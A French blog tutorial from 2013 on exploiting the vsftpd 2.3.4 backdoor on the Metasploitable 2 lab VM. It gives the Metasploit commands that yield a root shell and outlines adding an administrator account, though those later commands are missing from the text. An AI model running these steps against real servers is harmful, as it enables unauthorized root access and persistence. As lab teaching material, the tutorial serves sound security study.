dimanche 8 décembre 2013

VsFTPd 2.3.4 exploit



Comment obtenir les droits root sur un serveur FTP  linux VsFTP 2.3.4 ?

Cette version contient une faille de sécurité qui permet d'ouvrir une backdoor. Pour cette démonstration j'ai utilisé la distribution Metaspoitable 2 qui est une distribution ubuntu bourrée intentionnellement de failles de sécurité pour des raisons éducatives.  

Donc pour commencer on lance sa VM (sous VirtualBox dans mon cas, adresse IP 192.168.2.238)
On commence par un petit nmap pour s'assurer que la version est bien présente sur le système.



La version installée est bien vsftpd 2.3.4.
Maintentant on ouvre msfconsole et on cherche les failles vsftp.

msfconsole
msf > search vsftp

















msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads









msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.2.238
NB : 192.168.2.238 = IP du serveur cible
msf exploit(vsftpd_234_backdoor) >  set PAYLOAD cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit









Maintenant tapez les commandes, vous êtes root ;-)











Ajoutez un compte :

















Avec des droits Administrateur :









Connectez-vous :